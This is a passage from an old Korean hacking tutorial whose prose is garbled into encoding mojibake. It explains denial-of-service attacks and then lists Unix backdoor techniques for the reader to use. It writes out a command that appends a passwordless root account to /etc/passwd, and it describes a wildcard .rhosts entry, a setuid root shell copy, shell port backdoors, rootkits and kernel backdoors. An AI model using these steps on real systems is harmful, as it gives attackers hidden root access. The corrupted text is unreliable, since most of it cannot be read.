DOS(Denial Of Service)´Â ¼­ºñ½º °ÅºÎ °ø°ÝÀÌ´Ù. ½±°Ô Ç®ÀÌÇÏÀÚ¸é °ø°Ý È£½ºÆ®ÀÇ ¼­ºñ½º(ftp, smtp, telnet....)µéÀÌ Á¦ ±¸½ÇÀ» ¸øÇϵµ·Ï ¸ÛûÇÏ°Ô ¸¸µé¾î ¹ö¸®´Â °ø°ÝÀÌ´Ù. ÀÌ·± °ø°ÝÀº ¿ì¸®µé¿¡°Ô´Â º° µµ¿òÀÌ ¾ÊµÇ°ÚÁö¸¸ ¸¸ÀÏ A¶ó´Â ÀÎÅÍ³Ý ¼­ºñ½º ¾÷ü(ISP)°¡ B¶ó´Â ¼­ºñ½º ¾÷ü¿Í °æÀïÀ» ¹úÀÌ°í ÀÖ´Ù¸é? ´ç¿¬È÷ ¿©·¯ºÐµéÀº ¼­ºñ½º°¡ Àß µÇ°í ºü¸¥ ÀÎÅÍ³Ý ¼­ºñ½º ¾÷ü¸¦ ¼±ÅÃÇÒ °ÍÀÌ´Ù. ±×·³ A¿¡¼­ °í¿ëÇÑ ÇØÄ¿°¡ B¾÷üÀÇ ½Ã½ºÅÛÀ» DOS·Î °ø·«ÇÏ°Ô µÈ´Ù¸é.. B¾÷ü´Â ¼­ºñ½º°¡ Àß ¾ÊµÇ°ÚÁö.. »ç¿ëÀÚµéÀº ºÒÆíÀ» °Þ°Ô µÉ °ÍÀÌ°í.. µû¶ó¼­ ¼­ºñ½º°¡ Àß ¾ÊµÇ´Â B¾÷üº¸´Ù´Â A¾÷ü·Î »ç¿ëÀÚµéÀÌ ¸ô¸®°Ô µÉ °ÍÀÌ´Ù. DOSÀÇ °æ¿ì °ø°ÝÀÚ¸¦ Àß ÆľÇÇÒ ¼öµµ ¾ø´Ù. (spoofingÀ» »ç¿ëÇϹǷΠ´©°¡ ½Ã½ºÅÛÀ» DOS ·Î °ø°ÝÇÏ´ÂÁö ¹ß°ßÇس»±â ¾î·Æ´Ù.) ¹¹.. ÀÌ·±½ÄÀÌÁö...
DOS°ø°Ý¿¡´Â smurf. teardrop, ping flooding, syn flooding, Æøź¸ÞÀÏ µîµî.. ¼ö¾øÀÌ ¸¹´Ù. ¼­ºñ½º¸¸ Á¦ ±¸½Ç¸øÇÏ°Ô²û ÇÒ ¼öµµ ÀÖÁö¸¸ ½Ã½ºÅÛ Àüü¸¦ ¸À°¡°Ô ÇÒ ¼öµµ ÀÖ´Ù.

6.5 BackDoor

- Æнº¿öµå ¹éµµ¾î

> Æнº¿öµå »ìÆ캸±â :
root:fVi3dx5Ytkdo:0:0:root:/:/bin/bash
salsari:mKbj4T1sYji:501:100:salsari:/home/salsari:/bin/bash
Æнº¿öµå´Â 7°³ÀÇ Çʵå·Î ³ª´¶´Ù.

À¯Àú¸í : Æнº¿öµå : À¯ÀúID : ±×·ìID : À̸§ : Ȩ µð·ºÅ丮 : shell
root : fVi3dx5Ytkdo : 0 : 0 : root : / : /bin/bash

¿ÀÈ£¶ó~ »ý°¢º¸´Ù ½±³×.. ¿©·¯ºÐµé.. ÀÌÇØ°¡ °¡Áö?
±×·³ Æнº¿öµå ÆÄÀÏ¿¡ ¹éµµ¾î¸¦ ½É¾îº¼±î?
/etc/passwd¿¡ ´ÙÀ½°ú °°ÀÌ Áý¾î ³Ö¾îº¸ÀÚ.

$ echo ¡°hacker::0:0:hacker:/:/bin/bash¡± >> /etc/passwd

À¯ÀúID:±×·ìID°¡ 0:0À¸·Î ¼³Á¤µÇ¾î ÀÖ´Ù¸é ±×°ÍÀº rootÀÇ ±ÇÇÑÀ» °¡Áö°í ÀÖ´Ù´Â ¶æÀÌ´Ù.
±×·³ hacker¶ó´Â À¯Àú´Â ·çÆ®ÀÇ ±ÇÇÑÀ» °¡Áö°í Æнº¿öµå ¾øÀÌ ·Î±×ÀÎ ÇÒ ¼ö ÀÖ´Â°Ô µÇ³×...
ÀÌ·± ¹æ¹ýÀ¸·Îµµ ¹éµµ¾î¸¦ ¸¸µé ¼ö ÀÖÁö¸¸ ½±°Ô µéų ¼ö ÀÖ´Ù. ±×·¡¼­ Æнº¿öµå Áß°£Á¤µµ¿¡ Áý¾î³ÖµçÁö ¾Æ´Ï¸é Àß »ç¿ëÇÏÁö ¾Ê´Â »ç¿ëÀÚÀÇ À¯ÀúID¿Í ±×·ìID¸¦ 0:0À¸·Î ¹Ù²Ù¾î »ç¿ëÇÒ ¼öµµ ÀÖ´Ù.

- .rhosts ¹éµµ¾î
À¯´Ð½ºÀÇ rsh, rlogin ¸í·É¾î´Â Ȩµð·ºÅ丮ÀÇ .rhosts ÆÄÀÏÀ» ÂüÁ¶ÇÏ¿© »ç¿ëÇÏ´Â ¸í·É¾îÀÌ´Ù.
.rhosts¿¡ + + ¸¦ ³ÖÀ¸¸é ´©±¸µç Æнº¿öµå ¾øÀÌ ½Ã½ºÅÛ¿¡ Á¢¼ÓÇÒ ¼ö ÀÖ´Ù.

- setuid ¹éµµ¾î
2Àå¿¡¼­µµ ¼³¸íÇßµíÀÌ shellÀ» copyÇÏ¿© setuid¸¦ ºÙ¿©¼­ ¹éµµ¾î·Î »ç¿ëÇÑ´Ù.

-r-sr-xr-x 3 root root 88620 1997³â 7¿ù 16ÀÏ /bin/hacker
¸ðµå º¯°æÀº root ±ÇÇÑÀ¸·Î chmod 4755 <filename>

- TCP ½© ¹éµµ¾î
inetd.conf ¿Í services ÆÄÀÏ¿¡ ½© Æ÷Æ®(TCP)¸¦ ¿­¾î¼­ Á¢¼ÓÇÏ´Â ¹éµµ¾î.

- UDP ½© ¹éµµ¾î
¹æÈ­º®Àº DNS¼­ºñ½º ¶§¹®¿¡ UDP ÆÐŶÀº ¸·Áö ¾Ê´Â´Ù. ±× Á¡À» ÀÌ¿ëÇؼ­ UDP ½© ¹éµµ¾î¸¦ ¸¸µé¸é ¹«»çÅë°úÇÒ¼ö ÀÖ´Ù.

- Rootkit
¹éµµ¾î ÇÁ·Î±×·¥µéÀ» ÀÚµ¿À¸·Î ¼³Ä¡ÇÏ¿©ÁÖ´Â ÇÁ·Î±×·¥.

- Ä¿³Î ¹éµµ¾î
Ä¿³Î ÀÚü¸¦ ¼öÁ¤ÇÏ¿© ¹éµµ¾î¸¦ ¸¸µç´Ù. °í±Þ ¹éµµ¾î ¹æ¹ýÀ¸·Î ¹ß°ßÀÌ °ÅÀÇ ºÒ°¡´ÉÇÏ´Ù.

Âü°í ÀÚ·á
internet hacking document
security advisory
8lgm advisory

¡ã top